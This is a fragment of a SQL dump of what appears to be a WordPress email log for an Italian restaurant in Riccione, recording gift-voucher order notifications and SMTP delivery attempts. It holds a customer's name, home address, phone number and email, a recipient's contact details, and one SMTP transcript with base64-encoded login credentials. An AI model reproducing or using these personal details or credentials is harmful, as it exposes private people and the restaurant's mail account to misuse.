<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Grazie per aver usato www.ristorantesolymar.it.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22059,1162,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(22060,1162,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n0\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_body\">=0A=09=09=09=09=\r\n=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"=\r\ntop\" id=3D\"body_content\" style=3D\"background-color: #fdfdfd;\">=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<!-- Content -->=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"20\" cellspacing=3D\"0\"=\r\n width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding:=\r\n 48px 48px 32px;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09<div i=\r\nd=3D\"body_content_inner\" style=3D\'color: #737373; font-family: \"Helvetic=\r\na Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-hei=\r\nght: 150%; text-align: left;\'>=0A=0A<p style=3D\"margin: 0 0 16px;\">Ciao=\r\n Marcello,</p>=0A<p style=3D\"margin: 0 0 16px;\">Ti informiamo che abbiam=\r\no ricevuto il tuo ordine #1141 ed =C3=A8 in fase di elaborazione.</p>=0A=\r\n=0A=0A<h2 style=3D\'color: #557da1; display: block; font-family: \"Helveti=\r\nca Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-we=\r\night: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>=0A=\r\n=09[Ordine #1141] (25 Ottobre 2020)</h2>=0A=0A<div style=3D\"margin-botto=\r\nm: 40px;\">=0A=09<table class=3D\"td\" cellspacing=3D\"0\" cellpadding=3D\"6\"=\r\n border=3D\"1\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertic=\r\nal-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica,=\r\n Roboto, Arial, sans-serif;\">=0A=09=09<thead>=0A=09=09=09<tr>=0A=09=09=\r\n=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; border: 1p=\r\nx solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left=\r\n;\">Prodotto</th>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"c=\r\nolor: #737373; border: 1px solid #e4e4e4; vertical-align: middle; paddin=\r\ng: 12px; text-align: left;\">Quantit=C3=A0</th>=0A=09=09=09=09<th class=\r\n=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; border: 1px solid #e4e4e4=\r\n; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>=\r\n=0A=09=09=09</tr>=0A=09=09</thead>=0A=09=09<tbody>=0A=09=09=09=09<tr cla=\r\nss=3D\"order_item\">=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; bor=\r\nder: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align:=\r\n middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-s=\r\nerif; word-wrap: break-word;\">=0A=09=09Buono Regalo (valore a scelta)<ul=\r\n class=3D\"wc-item-meta\" style=3D\"font-size: small; margin: 1em 0 0; padd=\r\ning: 0; list-style: none;\">=0A<li style=3D\"margin: 0.5em 0 0; padding: 0=\r\n;\">=0A<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; margin-=\r\nright: .25em; clear: both;\">To Name:</strong> <p style=3D\"margin: 0;\">Fi=\r\nlippo Saulle</p>=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=\r\n=0A<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; margin-rig=\r\nht: .25em; clear: both;\">To:</strong> <p style=3D\"margin: 0;\"><a href=3D=\r\n\"mailto:Filos4@libero.it\" style=3D\"color: #557da1; font-weight: normal;=\r\n text-decoration: underline;\">Filos4@libero.it</a></p>=0A</li>=0A<li sty=\r\nle=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-l=\r\nabel\" style=3D\"float: left; margin-right: .25em; clear: both;\">From:</st=\r\nrong> <p style=3D\"margin: 0;\">Amalia e Riccardo Manduchi</p>=0A</li>=0A<=\r\nli style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-=\r\nmeta-label\" style=3D\"float: left; margin-right: .25em; clear: both;\">Mes=\r\nsage:</strong> <p style=3D\"margin: 0;\">Ti doniamo un piccolo momento di=\r\n piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in=\r\n questi mesi. Grazie zio!</p>=0A</li>=0A</ul>=09=09</td>=0A=09=09<td cla=\r\nss=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 1=\r\n2px; text-align: left; vertical-align: middle; font-family: \'Helvetica N=\r\neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09=091=09=09</td>=0A=\r\n=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e=\r\n4; padding: 12px; text-align: left; vertical-align: middle; font-family:=\r\n \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09=09<s=\r\npan class=3D\"woocommerce-Price-amount amount\">100,00<span class=3D\"wooco=\r\nmmerce-Price-currencySymbol\">=E2=82=AC</span></span>=09=09</td>=0A=09</t=\r\nr>=0A=09=09=09<tr>=0A=09=09=09<td colspan=3D\"3\" style=3D\"padding: 12px;=\r\n text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\'=\r\n, Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09=09=09<p style=3D\"marg=\r\nin: 0 0 16px;\">Validit=C3=A0 6 mesi dal momento dell\'acquisto</p>=0A=09=\r\n=09=09</td>=0A=09=09</tr>=0A=09=09=0A=09=09</tbody>=0A=09=09<tfoot>=0A=\r\n=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=\r\n=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px solid #e4e4e=\r\n4; vertical-align: middle; padding: 12px; text-align: left; border-top-w=\r\nidth: 4px;\">Subtotale:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=\r\n=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; p=\r\nadding: 12px; text-align: left; border-top-width: 4px;\"><span class=3D\"w=\r\noocommerce-Price-amount amount\">100,00<span class=3D\"woocommerce-Price-c=\r\nurrencySymbol\">=E2=82=AC</span></span></td>=0A=09=09=09=09=09</tr>=0A=09=\r\n=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" sco=\r\npe=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px solid #e4e=\r\n4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di=\r\n pagamento:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #7=\r\n37373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px;=\r\n text-align: left;\">PayPal</td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=\r\n=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" c=\r\nolspan=3D\"2\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertica=\r\nl-align: middle; padding: 12px; text-align: left;\">Totale:</th>=0A=09=09=\r\n=09=09=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px solid=\r\n #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><spa=\r\nn class=3D\"woocommerce-Price-amount amount\">100,00<span class=3D\"woocomm=\r\nerce-Price-currencySymbol\">=E2=82=AC</span></span></td>=0A=09=09=09=09=\r\n=09</tr>=0A=09=09=09=09=09=09=09</tfoot>=0A=09</table>=0A</div>=0A=0A=0A=\r\n<table id=3D\"addresses\" cellspacing=3D\"0\" cellpadding=3D\"0\" border=3D\"0\"=\r\n style=3D\"width: 100%; vertical-align: top; margin-bottom: 40px; padding=\r\n: 0;\">=0A=09<tr>=0A=09=09<td valign=3D\"top\" width=3D\"50%\" style=3D\"text-=\r\nalign: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sa=\r\nns-serif; border: 0; padding: 0;\">=0A=09=09=09<h2 style=3D\'color: #557da=\r\n1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Ari=\r\nal, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; m=\r\nargin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>=0A=0A=\r\n=09=09=09<address class=3D\"address\" style=3D\"padding: 12px; color: #7373=\r\n73; border: 1px solid #e4e4e4;\">=0A=09=09=09=09Marcello Manduchi<br>Torr=\r\nicelli 14<br>47030<br>San Mauro Pascoli<br>FORL=C3=8C-CESENA=09=09=09=09=\r\n=09=09=09=09=09<br><a href=3D\"tel:3204217844\" style=3D\"color: #557da1; f=\r\nont-weight: normal; text-decoration: underline;\">3204217844</a>=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<br>marcello.manduchi@hotmail.it=09=09=09=\r\n=09=09=09=09</address>=0A=09=09</td>=0A=09=09=09</tr>=0A</table>=0A<p st=\r\nyle=3D\"margin: 0 0 16px;\">Grazie per aver usato www.ristorantesolymar.it=\r\n..</p>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09</div>=0A=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09</table>=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<!-- End Content -->=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=\r\n=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Body --=\r\n>=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=\r\n=09=09=09=09</table>=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=\r\n=09=09<tr>=0A=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=\r\n=09=09=09=09=09<!-- Footer -->=0A=09=09=09=09=09=09<table border=3D\"0\" c=\r\nellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_footer\"=\r\n>=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td valign=3D\"to=\r\np\" style=3D\"padding: 0; border-radius: 6px;\">=0A=09=09=09=09=09=09=09=09=\r\n=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"100=\r\n%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=\r\n=09=09<td colspan=3D\"2\" valign=3D\"middle\" id=3D\"credit\" style=3D\'border-=\r\nradius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", H=\r\nelvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%;=\r\n text-align: center; padding: 24px 0;\'>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09<p style=3D\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p=\r\n>=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=\r\n=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=\r\n=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=\r\n=09=09=09=09=09<!-- End Footer -->=0A=09=09=09=09=09</td>=0A=09=09=09=09=\r\n</tr>=0A=09=09=09</table>=0A=09=09</div>=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK id=1kWyFH-0007tp-Ff\r\n'),(22061,1163,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22062,1163,'success',''),(22063,1163,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22064,1163,'to_header','notifiche@ristorantesolymar.it'),(22065,1163,'reply_to_header','Marcello Manduchi <marcello.manduchi@hotmail.it>'),(22066,1163,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22067,1163,'original_to','[\"notifiche@ristorantesolymar.it\"]'),(22068,1163,'original_subject','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1141) - 25 Ottobre 2020'),(22069,1163,'original_message','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hai ricevuto il seguente ordine da Marcello Manduchi:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Ordine #1141]</a> (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulazioni per la vendita.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22070,1163,'original_headers','Content-Type: text/html\r\nReply-to: Marcello Manduchi <marcello.manduchi@hotmail.it>\r\n'),(22071,1163,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:52:58 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22072,1164,'solution','Not found, check status column for more info.'),(22073,1164,'success','1'),(22074,1164,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22075,1164,'to_header','notifiche@ristorantesolymar.it'),(22076,1164,'reply_to_header','Marcello Manduchi <marcello.manduchi@hotmail.it>'),(22077,1164,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22078,1164,'original_to','[\"notifiche@ristorantesolymar.it\"]'),(22079,1164,'original_subject','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1141) - 25 Ottobre 2020'),(22080,1164,'original_message','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hai ricevuto il seguente ordine da Marcello Manduchi:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Ordine #1141]</a> (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 